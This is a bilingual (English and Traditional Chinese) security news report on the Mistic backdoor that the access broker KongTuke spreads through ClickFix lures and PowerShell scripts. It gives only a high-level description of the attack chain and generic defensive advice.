A new backdoor named Mistic has been identified in campaigns targeting organizations across insurance, education, IT, and professional services, marking a significant evolution in the capabilities of initial access broker (IAB) KongTuke. Security researchers report this development signals a strategic shift from reselling generic access to providing custom-built, stealthy persistence for downstream criminal operations.
Analysis from Symantec and the Carbon Black Threat Hunter Team, reported by The Hacker News, links the campaign to KongTuke and notes it has been active since at least April 2026. The broad targeting suggests the primary motive is to establish and sell persistent access, likely to threat actors such as ransomware operators.
The attack chain begins with a ClickFix social engineering lure, tricking users into executing a malicious PowerShell script. This script downloads and deploys the Mistic backdoor, also tracked as MLTBackdoor. For stealth, the malware exclusively uses HTTPS for command-and-control (C2) communications, allowing it to blend with legitimate encrypted web traffic and evade standard network monitoring.
The deployment of a custom backdoor is a key indicator of IAB specialization. Rather than offering one-time access, KongTuke is now providing a more resilient foothold designed for long-term, undetected presence within a network. This aligns with a growing trend of increased sophistication and partnership models within cybercriminal ecosystems.
Defenders are urged to monitor for anomalous PowerShell execution, particularly from user-initiated sessions, as a critical detection layer. Proactively blocking the published Indicators of Compromise (IOCs) related to KongTuke’s known infrastructure can also disrupt these campaigns. The emergence of Mistic underscores the continuous escalation in the battle between offensive persistence and defensive visibility.
一個名為 Mistic 的新型後門已被識別,其攻擊活動針對保險、教育、IT 及專業服務等行業的機構,標誌著初始訪問代理(IAB)KongTuke 的能力出現重大演進。安全研究人員報告稱,此發展表明其策略從轉售通用訪問權限,轉向為下游犯罪活動提供定制化、隱蔽的持久駐留。
據 The Hacker News 報導,Symantec 及 Carbon Black Threat Hunter 團隊的分析將該攻擊活動與 KongTuke 關聯,並指出其至少自 2026 年 4 月起已活躍。其廣泛的攻擊目標表明主要動機是建立及出售持久訪問權限,很可能出售予勒索軟件運營商等威脅行為者。
攻擊鏈始於一個 ClickFix 社會工程誘餌,誘騙用戶執行惡意 PowerShell 腳本。此腳本下載並部署 Mistic 後門,該後門亦被追蹤為 MLTBackdoor。為了隱蔽,該惡意軟件僅使用 HTTPS 進行指揮及控制(C2)通訊,使其能融入合法加密網絡流量中,並規避標準網絡監控。
部署定制化後門是 IAB 專業化的關鍵指標。KongTuke 如今並非提供一次性訪問,而是提供更穩固的立足點,旨在網絡內進行長期、不被發現的駐留。這符合網絡犯罪生態系統內日益增長的複雜化及合作模式趨勢。
防禦者被敦促監察異常 PowerShell 執行狀況,尤其是來自用戶發起的會話,作為關鍵的偵測層。主動封鎖與 KongTuke 已知基礎設施相關的已發佈攻擊指標(IOC),亦可阻斷這些攻擊活動。Mistic 的出現凸顯了進攻性持久駐留與防禦性可見度之間戰鬥的持續升級。